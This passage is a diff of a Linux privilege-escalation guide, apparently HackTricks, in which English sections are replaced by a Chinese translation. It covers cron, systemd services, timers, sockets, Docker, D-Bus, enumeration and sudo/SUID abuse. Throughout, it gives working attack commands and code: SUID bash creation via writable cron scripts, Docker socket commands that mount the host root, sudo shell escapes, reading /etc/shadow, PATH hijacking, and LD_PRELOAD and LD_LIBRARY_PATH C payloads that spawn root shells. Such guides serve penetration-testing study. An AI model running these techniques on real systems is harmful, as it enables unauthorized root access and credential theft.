shell very easily: +### Cron 脚本覆盖和符号链接 +如果你**可以修改一个由 root 执行的 cron 脚本**,你可以很容易地获得一个 shell: ```bash echo 'cp /bin/bash /tmp/bash; chmod +s /tmp/bash' > #Wait until it is executed /tmp/bash -p ``` - -If the script executed by root uses a **directory where you have full access**, maybe it could be useful to delete that folder and **create a symlink folder to another one** serving a script controlled by you - +如果由 root 执行的脚本使用一个 **您拥有完全访问权限的目录**,那么删除该文件夹并 **创建一个指向另一个由您控制的脚本的符号链接文件夹** 可能会很有用。 ```bash ln -d -s ``` +### 常见的 cron 任务 -### Frequent cron jobs - -You can monitor the processes to search for processes that are being executed every 1, 2 or 5 minutes. Maybe you can take advantage of it and escalate privileges. - -For example, to **monitor every 0.1s during 1 minute**, **sort by less executed commands** and delete the commands that have been executed the most, you can do: +您可以监控进程,以搜索每 1、2 或 5 分钟执行的进程。也许您可以利用这一点来提升权限。 +例如,要**每 0.1 秒监控 1 分钟**,**按执行次数较少的命令排序**并删除执行次数最多的命令,您可以执行: ```bash for i in $(seq 1 610); do ps -e --format cmd >> /tmp/monprocs.tmp; sleep 0.1; done; sort /tmp/monprocs.tmp | uniq -c | grep -v "\[" | sed '/^.\{200\}./d' | sort | grep -E -v "\s*[6-9][0-9][0-9]|\s*[0-9][0-9][0-9][0-9]"; rm /tmp/monprocs.tmp; ``` +**您还可以使用** [**pspy**](https://github.com/DominicBreuker/pspy/releases) (这将监视并列出每个启动的进程)。 -**You can also use** [**pspy**](https://github.com/DominicBreuker/pspy/releases) (this will monitor and list every process that starts). - -### Invisible cron jobs - -It's possible to create a cronjob **putting a carriage return after a comment** (without newline character), and the cron job will work. Example (note the carriage return char): +### 隐形的 cron 作业 +可以创建一个 cron 作业 **在注释后放置回车符**(没有换行符),并且 cron 作业将正常工作。示例(注意回车符): ```bash #This is a comment inside a cron config file\r* * * * * echo "Surprise!" ``` +## 服务 -## Services +### 可写的 _.service_ 文件 -### Writable _.service_ files +检查您是否可以写入任何 `.service` 文件,如果可以,您 **可以修改它** 以便在服务 **启动**、**重启**或 **停止** 时 **执行** 您的 **后门**(也许您需要等到机器重启)。\ +例如,在 .service 文件中创建您的后门,使用 **`ExecStart=/tmp/script.sh`** -Check if you can write any `.service` file, if you can, you **could modify it** so it **executes** your **backdoor when** the service is **started**, **restarted** or **stopped** (maybe you will need to wait until the machine is rebooted).\ -For example create your backdoor inside the .service file with **`ExecStart=/tmp/script.sh`** +### 可写的服务二进制文件 -### Writable service binaries +请记住,如果您对服务执行的二进制文件具有 **写权限**,您可以将它们更改为后门,这样当服务重新执行时,后门将被执行。 -Keep in mind that if you have **write permissions over binaries being executed by services**, you can change them for backdoors so when the services get re-executed the backdoors will be executed. - -### systemd PATH - Relative Paths - -You can see the PATH used by **systemd** with: +### systemd PATH - 相对路径 +您可以使用以下命令查看 **systemd** 使用的 PATH: ```bash systemctl show-environment ``` - -If you find that you can **write** in any of the folders of the path you may be able to **escalate privileges**. You need to search for **relative paths being used on service configurations** files like: - +如果您发现您可以在路径的任何文件夹中**写入**,您可能能够**提升权限**。您需要搜索**在服务配置**文件中使用的**相对路径**,例如: ```bash ExecStart=faraday-server ExecStart=/bin/sh -ec 'ifup --allow=hotplug %I; ifquery --state %I' ExecStop=/bin/sh "uptux-vuln-bin3 -stuff -hello" ``` +然后,在您可以写入的 systemd PATH 文件夹中创建一个 **可执行文件**,其 **名称与相对路径二进制文件相同**,当服务被要求执行脆弱操作(**启动**,**停止**,**重新加载**)时,您的 **后门将被执行**(普通用户通常无法启动/停止服务,但请检查您是否可以使用 `sudo -l`)。 -Then, create an **executable** with the **same name as the relative path binary** inside the systemd PATH folder you can write, and when the service is asked to execute the vulnerable action (**Start**, **Stop**, **Reload**), your **backdoor will be executed** (unprivileged users usually cannot start/stop services but check if you can use `sudo -l`). +**了解有关服务的更多信息,请参见 `man systemd.service`。** -**Learn more about services with `man systemd.service`.** +## **定时器** -## **Timers** - -**Timers** are systemd unit files whose name ends in `**.timer**` that control `**.service**` files or events. **Timers** can be used as an alternative to cron as they have built-in support for calendar time events and monotonic time events and can be run asynchronously. - -You can enumerate all the timers with: +**定时器** 是以 `**.timer**` 结尾的 systemd 单元文件,用于控制 `**.service**` 文件或事件。 **定时器** 可以作为 cron 的替代方案,因为它们内置支持日历时间事件和单调时间事件,并且可以异步运行。 +您可以通过以下命令列出所有定时器: ```bash systemctl list-timers --all ``` +### 可写定时器 -### Writable timers - -If you can modify a timer you can make it execute some existents of systemd.unit (like a `.service` or a `.target`) - +如果您可以修改定时器,则可以使其执行某些 systemd.unit 的实例(如 `.service` 或 `.target`) ```bash Unit=backdoor.service ``` +在文档中,您可以阅读单位的定义: -In the documentation you can read what the Unit is: +> 当此计时器到期时要激活的单位。参数是单位名称,其后缀不是“.timer”。如果未指定,则此值默认为与计时器单位同名的服务,后缀除外。(见上文。)建议激活的单位名称和计时器单位的单位名称在后缀之外是相同的。 -> The unit to activate when this timer elapses. The argument is a unit name, whose suffix is not ".timer". If not specified, this value defaults to a service that has the same name as the timer unit, except for the suffix. (See above.) It is recommended that the unit name that is activated and the unit name of the timer unit are named identically, except for the suffix. +因此,要滥用此权限,您需要: -Therefore, to abuse this permission you would need to: +- 找到某个 systemd 单元(如 `.service`),该单元正在 **执行一个可写的二进制文件** +- 找到某个 systemd 单元,该单元正在 **执行一个相对路径**,并且您对 **systemd PATH** 具有 **可写权限**(以冒充该可执行文件) -- Find some systemd unit (like a `.service`) that is **executing a writable binary** -- Find some systemd unit that is **executing a relative path** and you have **writable privileges** over the **systemd PATH** (to impersonate that executable) +**了解有关计时器的更多信息,请使用 `man systemd.timer`。** -**Learn more about timers with `man systemd.timer`.** - -### **Enabling Timer** - -To enable a timer you need root privileges and to execute: +### **启用计时器** +要启用计时器,您需要 root 权限并执行: ```bash sudo systemctl enable backu2.timer Created symlink /etc/systemd/system/multi-user.target.wants/backu2.timer → /lib/systemd/system/backu2.timer. ``` +注意 **定时器** 是通过在 `/etc/systemd/system/.wants/.timer` 上创建一个符号链接来 **激活** 的。 -Note the **timer** is **activated** by creating a symlink to it on `/etc/systemd/system/.wants/.timer` +## 套接字 -## Sockets +Unix 域套接字 (UDS) 使得在客户端-服务器模型中同一台或不同机器上的 **进程通信** 成为可能。它们利用标准的 Unix 描述符文件进行计算机间通信,并通过 `.socket` 文件进行设置。 -Unix Domain Sockets (UDS) enable **process communication** on the same or different machines within client-server models. They utilize standard Unix descriptor files for inter-computer communication and are set up through `.socket` files. +套接字可以使用 `.socket` 文件进行配置。 -Sockets can be configured using `.socket` files. +**通过 `man systemd.socket` 了解更多关于套接字的信息。** 在此文件中,可以配置几个有趣的参数: -**Learn more about sockets with `man systemd.socket`.** Inside this file, several interesting parameters can be configured: +- `ListenStream`, `ListenDatagram`, `ListenSequentialPacket`, `ListenFIFO`, `ListenSpecial`, `ListenNetlink`, `ListenMessageQueue`, `ListenUSBFunction`: 这些选项不同,但总结用于 **指示将要监听的位置**(AF_UNIX 套接字文件的路径,监听的 IPv4/6 和/或端口号等) +- `Accept`: 接受一个布尔参数。如果 **true**,则 **为每个传入连接生成一个服务实例**,并且仅将连接套接字传递给它。如果 **false**,则所有监听套接字本身都被 **传递给启动的服务单元**,并且仅为所有连接生成一个服务单元。对于数据报套接字和 FIFO,此值被忽略,因为单个服务单元无条件处理所有传入流量。**默认为 false**。出于性能原因,建议仅以适合 `Accept=no` 的方式编写新的守护进程。 +- `ExecStartPre`, `ExecStartPost`: 接受一个或多个命令行,这些命令在监听 **套接字**/FIFO 被 **创建** 和绑定之前或之后 **执行**。命令行的第一个标记必须是绝对文件名,后面跟着进程的参数。 +- `ExecStopPre`, `ExecStopPost`: 在监听 **套接字**/FIFO 被 **关闭** 和移除之前或之后 **执行** 的附加 **命令**。 +- `Service`: 指定 **在传入流量上激活的** **服务** 单元名称。此设置仅允许用于 Accept=no 的套接字。默认为与套接字同名的服务(后缀被替换)。在大多数情况下,不需要使用此选项。 -- `ListenStream`, `ListenDatagram`, `ListenSequentialPacket`, `ListenFIFO`, `ListenSpecial`, `ListenNetlink`, `ListenMessageQueue`, `ListenUSBFunction`: These options are different but a summary is used to **indicate where it is going to listen** to the socket (the path of the AF_UNIX socket file, the IPv4/6 and/or port number to listen, etc.) -- `Accept`: Takes a boolean argument. If **true**, a **service instance is spawned for each incoming connection** and only the connection socket is passed to it. If **false**, all listening sockets themselves are **passed to the started service unit**, and only one service unit is spawned for all connections. This value is ignored for datagram sockets and FIFOs where a single service unit unconditionally handles all incoming traffic. **Defaults to false**. For performance reasons, it is recommended to write new daemons only in a way that is suitable for `Accept=no`. -- `ExecStartPre`, `ExecStartPost`: Takes one or more command lines, which are **executed before** or **after** the listening **sockets**/FIFOs are **created** and bound, respectively. The first token of the command line must be an absolute filename, then followed by arguments for the process. -- `ExecStopPre`, `ExecStopPost`: Additional **commands** that are **executed before** or **after** the listening **sockets**/FIFOs are **closed** and removed, respectively. -- `Service`: Specifies the **service** unit name **to activate** on **incoming traffic**. This setting is only allowed for sockets with Accept=no. It defaults to the service that bears the same name as the socket (with the suffix replaced). In most cases, it should not be necessary to use this option. +### 可写的 .socket 文件 -### Writable .socket files +如果您发现一个 **可写** 的 `.socket` 文件,您可以在 `[Socket]` 部分的开头添加类似 `ExecStartPre=/home/kali/sys/backdoor` 的内容,后门将在套接字创建之前执行。因此,您 **可能需要等到机器重启。**\ +&#xNAN;_N注意系统必须使用该套接字文件配置,否则后门将不会被执行_ -If you find a **writable** `.socket` file you can **add** at the beginning of the `[Socket]` section something like: `ExecStartPre=/home/kali/sys/backdoor` and the backdoor will be executed before the socket is created. Therefore, you will **probably need to wait until the machine is rebooted.**\ -&#xNAN;_Note that the system must be using that socket file configuration or the backdoor won't be executed_ +### 可写套接字 -### Writable sockets - -If you **identify any writable socket** (_now we are talking about Unix Sockets and not about the config `.socket` files_), then **you can communicate** with that socket and maybe exploit a vulnerability. - -### Enumerate Unix Sockets +如果您 **识别到任何可写套接字**(_现在我们谈论的是 Unix 套接字,而不是配置 `.socket` 文件_),那么 **您可以与该套接字进行通信**,并可能利用一个漏洞。 +### 枚举 Unix 套接字 ```bash netstat -a -p --unix ``` - -### Raw connection - +### 原始连接 ```bash #apt-get install netcat-openbsd nc -U /tmp/socket #Connect to UNIX-domain stream socket @@ -560,93 +473,88 @@ nc -uU /tmp/socket #Connect to UNIX-domain datagram socket #apt-get install socat socat - UNIX-CLIENT:/dev/socket #connect to UNIX-domain socket, irrespective of its type ``` - -**Exploitation example:** +**利用示例:** {{#ref}} socket-command-injection.md {{#endref}} -### HTTP sockets - -Note that there may be some **sockets listening for HTTP** requests (_I'm not talking about .socket files but the files acting as unix sockets_). You can check this with: +### HTTP 套接字 +请注意,可能有一些 **正在监听 HTTP** 请求的 **套接字**(_我不是在谈论 .socket 文件,而是作为 unix 套接字的文件_)。您可以通过以下方式检查: ```bash curl --max-time 2 --unix-socket /pat/to/socket/files http:/index ``` +如果套接字 **响应一个 HTTP** 请求,那么你可以 **与之通信**,并可能 **利用某些漏洞**。 -If the socket **responds with an HTTP** request, then you can **communicate** with it and maybe **exploit some vulnerability**. +### 可写的 Docker 套接字 -### Writable Docker Socket +Docker 套接字,通常位于 `/var/run/docker.sock`,是一个关键文件,应该被保护。默认情况下,它对 `root` 用户和 `docker` 组的成员是可写的。拥有对这个套接字的写访问权限可能导致特权提升。以下是如何做到这一点的详细说明,以及在 Docker CLI 不可用时的替代方法。 -The Docker socket, often found at `/var/run/docker.sock`, is a critical file that should be secured. By default, it's writable by the `root` user and members of the `docker` group. Possessing write access to this socket can lead to privilege escalation. Here's a breakdown of how this can be done and alternative methods if the Docker CLI isn't available. - -#### **Privilege Escalation with Docker CLI** - -If you have write access to the Docker socket, you can escalate privileges using the following commands: +#### **使用 Docker CLI 进行特权提升** +如果你对 Docker 套接字具有写访问权限,可以使用以下命令提升特权: ```bash docker -H unix:///var/run/docker.sock run -v /:/host -it ubuntu chroot /host /bin/bash docker -H unix:///var/run/docker.sock run -it --privileged --pid=host debian nsenter -t 1 -m -u -n -i sh ``` +这些命令允许您以根级别访问主机的文件系统运行容器。 -These commands allow you to run a container with root-level access to the host's file system. +#### **直接使用 Docker API** -#### **Using Docker API Directly** +在 Docker CLI 不可用的情况下,仍然可以使用 Docker API 和 `curl` 命令操作 Docker 套接字。 -In cases where the Docker CLI isn't available, the Docker socket can still be manipulated using the Docker API and `curl` commands. +1. **列出 Docker 镜像:** 检索可用镜像的列表。 -1. **List Docker Images:** Retrieve the list of available images. +```bash +curl -XGET --unix-socket /var/run/docker.sock http://localhost/images/json +``` - ```bash - curl -XGET --unix-socket /var/run/docker.sock http://localhost/images/json - ``` +2. **创建容器:** 发送请求以创建一个挂载主机系统根目录的容器。 -2. **Create a Container:** Send a request to create a container that mounts the host system's root directory. +```bash +curl -XPOST -H "Content-Type: application/json" --unix-socket /var/run/docker.sock -d '{"Image":"","Cmd":["/bin/sh"],"DetachKeys":"Ctrl-p,Ctrl-q","OpenStdin":true,"Mounts":[{"Type":"bind","Source":"/","Target":"/host_root"}]}' http://localhost/containers/create +``` - ```bash - curl -XPOST -H "Content-Type: application/json" --unix-socket /var/run/docker.sock -d '{"Image":"","Cmd":["/bin/sh"],"DetachKeys":"Ctrl-p,Ctrl-q","OpenStdin":true,"Mounts":[{"Type":"bind","Source":"/","Target":"/host_root"}]}' http://localhost/containers/create - ``` +启动新创建的容器: - Start the newly created container: +```bash +curl -XPOST --unix-socket /var/run/docker.sock http://localhost/containers//start +``` - ```bash - curl -XPOST --unix-socket /var/run/docker.sock http://localhost/containers//start - ``` +3. **附加到容器:** 使用 `socat` 建立与容器的连接,从而在其中执行命令。 -3. **Attach to the Container:** Use `socat` to establish a connection to the container, enabling command execution within it. +```bash +socat - UNIX-CONNECT:/var/run/docker.sock +POST /containers//attach?stream=1&stdin=1&stdout=1&stderr=1 HTTP/1.1 +Host: +Connection: Upgrade +Upgrade: tcp +``` - ```bash - socat - UNIX-CONNECT:/var/run/docker.sock - POST /containers//attach?stream=1&stdin=1&stdout=1&stderr=1 HTTP/1.1 - Host: - Connection: Upgrade - Upgrade: tcp - ``` +在设置好 `socat` 连接后,您可以直接在容器中以根级别访问主机的文件系统执行命令。 -After setting up the `socat` connection, you can execute commands directly in the container with root-level access to the host's filesystem. +### 其他 -### Others +请注意,如果您对 docker 套接字具有写权限,因为您在 **`docker` 组内**,您有 [**更多的权限提升方式**](interesting-groups-linux-pe/#docker-group)。如果 [**docker API 在某个端口上监听**,您也可以有能力进行破坏](../../network-services-pentesting/2375-pentesting-docker.md#compromising)。 -Note that if you have write permissions over the docker socket because you are **inside the group `docker`** you have [**more ways to escalate privileges**](interesting-groups-linux-pe/#docker-group). If the [**docker API is listening in a port** you can also be able to compromise it](../../network-services-pentesting/2375-pentesting-docker.md#compromising). - -Check **more ways to break out from docker or abuse it to escalate privileges** in: +查看 **更多从 docker 中突破或滥用它以提升权限的方法** 在: {{#ref}} docker-security/ {{#endref}} -## Containerd (ctr) privilege escalation +## Containerd (ctr) 权限提升 -If you find that you can use the **`ctr`** command read the following page as **you may be able to abuse it to escalate privileges**: +如果您发现可以使用 **`ctr`** 命令,请阅读以下页面,因为 **您可能能够滥用它以提升权限**: {{#ref}} containerd-ctr-privilege-escalation.md {{#endref}} -## **RunC** privilege escalation +## **RunC** 权限提升 -If you find that you can use the **`runc`** command read the following page as **you may be able to abuse it to escalate privileges**: +如果您发现可以使用 **`runc`** 命令,请阅读以下页面,因为 **您可能能够滥用它以提升权限**: {{#ref}} runc-privilege-escalation.md @@ -654,37 +562,34 @@ runc-privilege-escalation.md ## **D-Bus** -D-Bus is a sophisticated **inter-Process Communication (IPC) system** that enables applications to efficiently interact and share data. Designed with the modern Linux system in mind, it offers a robust framework for different forms of application communication. +D-Bus 是一个复杂的 **进程间通信 (IPC) 系统**,使应用程序能够高效地交互和共享数据。它是为现代 Linux 系统设计的,提供了一个强大的框架,用于不同形式的应用程序通信。 -The system is versatile, supporting basic IPC that enhances data exchange between processes, reminiscent of **enhanced UNIX domain sockets**. Moreover, it aids in broadcasting events or signals, fostering seamless integration among system components. For instance, a signal from a Bluetooth daemon about an incoming call can prompt a music player to mute, enhancing user experience. Additionally, D-Bus supports a remote object system, simplifying service requests and method invocations between applications, streamlining processes that were traditionally complex. +该系统灵活多变,支持基本的 IPC,增强了进程之间的数据交换,类似于 **增强的 UNIX 域套接字**。此外,它有助于广播事件或信号,促进系统组件之间的无缝集成。例如,来自蓝牙守护进程的关于来电的信号可以促使音乐播放器静音,从而增强用户体验。此外,D-Bus 支持远程对象系统,简化了应用程序之间的服务请求和方法调用,简化了传统上复杂的过程。 -D-Bus operates on an **allow/deny model**, managing message permissions (method calls, signal emissions, etc.) based on the cumulative effect of matching policy rules. These policies specify interactions with the bus, potentially allowing for privilege escalation through the exploitation of these permissions. +D-Bus 基于 **允许/拒绝模型**,根据匹配的策略规则的累积效果管理消息权限(方法调用、信号发射等)。这些策略指定与总线的交互,可能通过利用这些权限来允许权限提升。 -An example of such a policy in `/etc/dbus-1/system.d/wpa_supplicant.conf` is provided, detailing permissions for the root user to own, send to, and receive messages from `fi.w1.wpa_supplicant1`. - -Policies without a specified user or group apply universally, while "default" context policies apply to all not covered by other specific policies. +在 `/etc/dbus-1/system.d/wpa_supplicant.conf` 中提供了这样一个策略的示例,详细说明了根用户拥有、发送和接收来自 `fi.w1.wpa_supplicant1` 的消息的权限。 +没有指定用户或组的策略适用于所有情况,而“默认”上下文策略适用于所有未被其他特定策略覆盖的情况。 ```xml - - - - + + + + ``` - -**Learn how to enumerate and exploit a D-Bus communication here:** +**了解如何枚举和利用 D-Bus 通信:** {{#ref}} d-bus-enumeration-and-command-injection-privilege-escalation.md {{#endref}} -## **Network** +## **网络** -It's always interesting to enumerate the network and figure out the position of the machine. - -### Generic enumeration +枚举网络并确定机器的位置总是很有趣。 +### 通用枚举 ```bash #Hostname, hosts and DNS cat /etc/hostname /etc/hosts /etc/resolv.conf @@ -707,30 +612,24 @@ cat /etc/networks #Files used by network services lsof -i ``` +### 开放端口 -### Open ports - -Always check network services running on the machine that you weren't able to interact with before accessing it: - +在访问之前,始终检查在机器上运行的网络服务,这些服务是您之前无法与之交互的: ```bash (netstat -punta || ss --ntpu) (netstat -punta || ss --ntpu) | grep "127.0" ``` - ### Sniffing -Check if you can sniff traffic. If you can, you could be able to grab some credentials. - +检查您是否可以嗅探流量。如果可以,您可能能够获取一些凭据。 ``` timeout 1 tcpdump ``` +## 用户 -## Users - -### Generic Enumeration - -Check **who** you are, which **privileges** do you have, which **users** are in the systems, which ones can **login** and which ones have **root privileges:** +### 通用枚举 +检查 **你是谁**,你拥有的 **权限**,系统中有哪些 **用户**,哪些可以 **登录**,哪些具有 **root 权限:** ```bash #Info about me id || (whoami && groups) 2>/dev/null @@ -752,15 +651,14 @@ for i in $(cut -d":" -f1 /etc/passwd 2>/dev/null);do id $i;done 2>/dev/null | so #Current user PGP keys gpg --list-keys 2>/dev/null ``` - ### Big UID -Some Linux versions were affected by a bug that allows users with **UID > INT_MAX** to escalate privileges. More info: [here](https://gitlab.freedesktop.org/polkit/polkit/issues/74), [here](https://github.com/mirchr/security-research/blob/master/vulnerabilities/CVE-2018-19788.sh) and [here](https://twitter.com/paragonsec/status/1071152249529884674).\ -**Exploit it** using: **`systemd-run -t /bin/bash`** +一些Linux版本受到一个漏洞的影响,该漏洞允许**UID > INT_MAX**的用户提升权限。更多信息:[here](https://gitlab.freedesktop.org/polkit/polkit/issues/74),[here](https://github.com/mirchr/security-research/blob/master/vulnerabilities/CVE-2018-19788.sh)和[here](https://twitter.com/paragonsec/status/1071152249529884674)。\ +**利用它**使用:**`systemd-run -t /bin/bash`** ### Groups -Check if you are a **member of some group** that could grant you root privileges: +检查您是否是可以授予您root权限的**某个组的成员**: {{#ref}} interesting-groups-linux-pe/ @@ -768,51 +666,44 @@ interesting-groups-linux-pe/ ### Clipboard -Check if anything interesting is located inside the clipboard (if possible) - +检查剪贴板中是否有任何有趣的内容(如果可能的话) ```bash if [ `which xclip 2>/dev/null` ]; then - echo "Clipboard: "`xclip -o -selection clipboard 2>/dev/null` - echo "Highlighted text: "`xclip -o 2>/dev/null` - elif [ `which xsel 2>/dev/null` ]; then - echo "Clipboard: "`xsel -ob 2>/dev/null` - echo "Highlighted text: "`xsel -o 2>/dev/null` - else echo "Not found xsel and xclip" - fi +echo "Clipboard: "`xclip -o -selection clipboard 2>/dev/null` +echo "Highlighted text: "`xclip -o 2>/dev/null` +elif [ `which xsel 2>/dev/null` ]; then +echo "Clipboard: "`xsel -ob 2>/dev/null` +echo "Highlighted text: "`xsel -o 2>/dev/null` +else echo "Not found xsel and xclip" +fi ``` - -### Password Policy - +### 密码策略 ```bash grep "^PASS_MAX_DAYS\|^PASS_MIN_DAYS\|^PASS_WARN_AGE\|^ENCRYPT_METHOD" /etc/login.defs ``` +### 已知密码 -### Known passwords - -If you **know any password** of the environment **try to login as each user** using the password. +如果你**知道环境中的任何密码**,请**尝试以每个用户的身份登录**,使用该密码。 ### Su Brute -If don't mind about doing a lot of noise and `su` and `timeout` binaries are present on the computer, you can try to brute-force user using [su-bruteforce](https://github.com/carlospolop/su-bruteforce).\ -[**Linpeas**](https://github.com/carlospolop/privilege-escalation-awesome-scripts-suite) with `-a` parameter also try to brute-force users. +如果你不介意制造很多噪音,并且计算机上存在`su`和`timeout`二进制文件,你可以尝试使用[su-bruteforce](https://github.com/carlospolop/su-bruteforce)进行暴力破解用户。\ +[**Linpeas**](https://github.com/carlospolop/privilege-escalation-awesome-scripts-suite)使用`-a`参数也会尝试暴力破解用户。 -## Writable PATH abuses +## 可写的 PATH 滥用 ### $PATH -If you find that you can **write inside some folder of the $PATH** you may be able to escalate privileges by **creating a backdoor inside the writable folder** with the name of some command that is going to be executed by a different user (root ideally) and that is **not loaded from a folder that is located previous** to your writable folder in $PATH. +如果你发现可以**在$PATH的某个文件夹内写入**,你可能能够通过**在可写文件夹内创建一个后门**,其名称为将由其他用户(理想情况下是root)执行的某个命令,并且该命令**不是从位于你的可写文件夹之前的文件夹加载**的,从而提升权限。 -### SUDO and SUID - -You could be allowed to execute some command using sudo or they could have the suid bit. Check it using: +### SUDO 和 SUID +你可能被允许使用sudo执行某些命令,或者它们可能具有suid位。使用以下命令检查: ```bash sudo -l #Check commands you can execute with sudo find / -perm -4000 2>/dev/null #Find all SUID binaries ``` - -Some **unexpected commands allow you to read and/or write files or even execute a command.** For example: - +一些 **意外的命令允许您读取和/或写入文件,甚至执行命令。** 例如: ```bash sudo awk 'BEGIN {system("/bin/sh")}' sudo find /etc -exec sh -i \; @@ -821,43 +712,33 @@ sudo tar c a.tar -I ./runme.sh a ftp>!/bin/sh less>! ``` - ### NOPASSWD -Sudo configuration might allow a user to execute some command with another user's privileges without knowing the password. - +Sudo 配置可能允许用户在不知道密码的情况下以其他用户的权限执行某些命令。 ``` $ sudo -l User demo may run the following commands on crashlab: - (root) NOPASSWD: /usr/bin/vim +(root) NOPASSWD: /usr/bin/vim ``` - -In this example the user `demo` can run `vim` as `root`, it is now trivial to get a shell by adding an ssh key into the root directory or by calling `sh`. - +在这个例子中,用户 `demo` 可以以 `root` 身份运行 `vim`,现在通过将 ssh 密钥添加到根目录或调用 `sh` 来获取 shell 变得微不足道。 ``` sudo vim -c '!sh' ``` - ### SETENV -This directive allows the user to **set an environment variable** while executing something: - +此指令允许用户在执行某些操作时**设置环境变量**: ```bash $ sudo -l User waldo may run the following commands on admirer: - (ALL) SETENV: /opt/scripts/admin_tasks.sh +(ALL) SETENV: /opt/scripts/admin_tasks.sh ``` - -This example, **based on HTB machine Admirer**, was **vulnerable** to **PYTHONPATH hijacking** to load an arbitrary python library while executing the script as root: - +这个例子,**基于 HTB 机器 Admirer**,**易受** **PYTHONPATH 劫持** 的影响,在以 root 身份执行脚本时加载任意 python 库: ```bash sudo PYTHONPATH=/dev/shm/ /opt/scripts/admin_tasks.sh ``` +### Sudo 执行绕过路径 -### Sudo execution bypassing paths - -**Jump** to read other files or use **symlinks**. For example in sudoers file: _hacker10 ALL= (root) /bin/less /var/log/\*_ - +**跳转**到读取其他文件或使用 **符号链接**。例如在 sudoers 文件中: _hacker10 ALL= (root) /bin/less /var/log/\*_ ```bash sudo less /var/logs/anything less>:e /etc/shadow #Jump to read other files using privileged less @@ -867,89 +748,73 @@ less>:e /etc/shadow #Jump to read other files using privileged less ln /etc/shadow /var/log/new sudo less /var/log/new #Use symlinks to read any file ``` - -If a **wildcard** is used (\*), it is even easier: - +如果使用 **wildcard** (\*),则更容易: ```bash sudo less /var/log/../../etc/shadow #Read shadow sudo less /var/log/something /etc/shadow #Red 2 files ``` +**对策**: [https://blog.compass-security.com/2012/10/dangerous-sudoers-entries-part-5-recapitulation/](https://blog.compass-security.com/2012/10/dangerous-sudoers-entries-part-5-recapitulation/) -**Countermeasures**: [https://blog.compass-security.com/2012/10/dangerous-sudoers-entries-part-5-recapitulation/](https://blog.compass-security.com/2012/10/dangerous-sudoers-entries-part-5-recapitulation/) - -### Sudo command/SUID binary without command path - -If the **sudo permission** is given to a single command **without specifying the path**: _hacker10 ALL= (root) less_ you can exploit it by changing the PATH variable +### 没有命令路径的 Sudo 命令/SUID 二进制文件 +如果 **sudo 权限** 被授予单个命令 **而没有指定路径**: _hacker10 ALL= (root) less_ 你可以通过更改 PATH 变量来利用它 ```bash export PATH=/tmp:$PATH #Put your backdoor in /tmp and name it "less" sudo less ``` - -This technique can also be used if a **suid** binary **executes another command without specifying the path to it (always check with** _**strings**_ **the content of a weird SUID binary)**. +这种技术也可以在**suid**二进制文件**执行另一个命令而不指定路径时使用(始终检查**_**strings**_ **内容的奇怪SUID二进制文件)**。 [Payload examples to execute.](payloads-to-execute.md) -### SUID binary with command path +### 带命令路径的SUID二进制文件 -If the **suid** binary **executes another command specifying the path**, then, you can try to **export a function** named as the command that the suid file is calling. - -For example, if a suid binary calls _**/usr/sbin/service apache2 start**_ you have to try to create the function and export it: +如果**suid**二进制文件**执行另一个命令并指定路径**,那么你可以尝试**导出一个函数**,其名称与suid文件调用的命令相同。 +例如,如果一个suid二进制文件调用_**/usr/sbin/service apache2 start**_,你需要尝试创建该函数并导出它: ```bash function /usr/sbin/service() { cp /bin/bash /tmp && chmod +s /tmp/bash && /tmp/bash -p; } export -f /usr/sbin/service ``` - -Then, when you call the suid binary, this function will be executed +然后,当你调用suid二进制文件时,将执行此函数 ### LD_PRELOAD & **LD_LIBRARY_PATH** -The **LD_PRELOAD** environment variable is used to specify one or more shared libraries (.so files) to be loaded by the loader before all others, including the standard C library (`libc.so`). This process is known as preloading a library. +**LD_PRELOAD**环境变量用于指定一个或多个共享库(.so文件),这些库将在加载器加载所有其他库之前被加载,包括标准C库(`libc.so`)。这个过程被称为库的预加载。 -However, to maintain system security and prevent this feature from being exploited, particularly with **suid/sgid** executables, the system enforces certain conditions: +然而,为了维护系统安全并防止此功能被利用,特别是在**suid/sgid**可执行文件中,系统强制执行某些条件: -- The loader disregards **LD_PRELOAD** for executables where the real user ID (_ruid_) does not match the effective user ID (_euid_). -- For executables with suid/sgid, only libraries in standard paths that are also suid/sgid are preloaded. - -Privilege escalation can occur if you have the ability to execute commands with `sudo` and the output of `sudo -l` includes the statement **env_keep+=LD_PRELOAD**. This configuration allows the **LD_PRELOAD** environment variable to persist and be recognized even when commands are run with `sudo`, potentially leading to the execution of arbitrary code with elevated privileges. +- 对于真实用户ID(_ruid_)与有效用户ID(_euid_)不匹配的可执行文件,加载器会忽略**LD_PRELOAD**。 +- 对于具有suid/sgid的可执行文件,仅在标准路径中且也具有suid/sgid的库会被预加载。 +如果你有能力使用`sudo`执行命令,并且`sudo -l`的输出包含语句**env_keep+=LD_PRELOAD**,则可能发生权限提升。此配置允许**LD_PRELOAD**环境变量持续存在并被识别,即使在使用`sudo`运行命令时,这可能导致以提升的权限执行任意代码。 ``` Defaults env_keep += LD_PRELOAD ``` - -Save as **/tmp/pe.c** - +保存为 **/tmp/pe.c** ```c #include #include #include void _init() { - unsetenv("LD_PRELOAD"); - setgid(0); - setuid(0); - system("/bin/bash"); +unsetenv("LD_PRELOAD"); +setgid(0); +setuid(0); +system("/bin/bash"); } ``` - -Then **compile it** using: - +然后 **编译它** 使用: ```bash cd /tmp gcc -fPIC -shared -o pe.so pe.c -nostartfiles ``` - -Finally, **escalate privileges** running - +最后,**提升权限** 运行 ```bash sudo LD_PRELOAD=./pe.so #Use any command you can run with sudo ``` - > [!CAUTION] -> A similar privesc can be abused if the attacker controls the **LD_LIBRARY_PATH** env variable because he controls the path where libraries are going to be searched. - +> 如果攻击者控制了 **LD_LIBRARY_PATH** 环境变量,则可以滥用类似的权限提升,因为他控制了将要搜索库的路径。 ```c #include #include @@ -957,9 +822,9 @@ sudo LD_PRELOAD=./pe.so #Use any command you can run with sudo static void hijack() __attribute__((constructor)); void hijack() { - unsetenv("LD_LIBRARY_PATH"); - setresuid(0,0,0); - system("/bin/bash -p"); +unsetenv("LD_LIBRARY_PATH"); +setresuid(0,0,0); +system("/bin/bash -p"); } ``` @@ -969,19 +834,15 @@ cd /tmp gcc -o /tmp/libcrypt.so.1 -shared -fPIC /home/user/tools/sudo/library_path.c sudo LD_LIBRARY_PATH=/tmp ``` +### SUID 二进制文件 – .so 注入 -### SUID Binary – .so injection - -When encountering a binary with **SUID** permissions that seems unusual, it's a good practice to verify if it's loading **.so** files properly. This can be checked by running the following command: - +当遇到一个具有 **SUID** 权限且看起来不寻常的二进制文件时,验证它是否正确加载 **.so** 文件是一个好习惯。可以通过运行以下命令来检查: ```bash strace 2>&1 | grep -i -E "open|access|no such file" ``` 